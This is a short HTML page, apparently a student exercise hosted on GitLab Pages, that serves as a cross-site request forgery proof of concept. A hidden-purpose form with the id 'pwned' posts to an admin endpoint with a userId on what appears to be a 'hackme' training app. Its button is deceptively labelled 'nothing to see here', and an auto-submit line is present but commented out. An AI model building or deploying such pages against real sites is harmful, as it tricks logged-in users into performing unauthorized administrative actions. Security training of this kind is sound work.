<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <meta name="generator" content="GitLab Pages">
    <title>Plain HTML site using GitLab Pages</title>
    <link rel="stylesheet" href="style.css">
  </head>
  <body>
  <form id="pwned" action="https:/awacademy-hackme6.herokuapp.com/admin?userId=206" method="post">
    <input  type="submit" value="nothing to see here">
  </form>


  <script>
    //document.forms[0].submit();
  </script>
  </body>
</html>

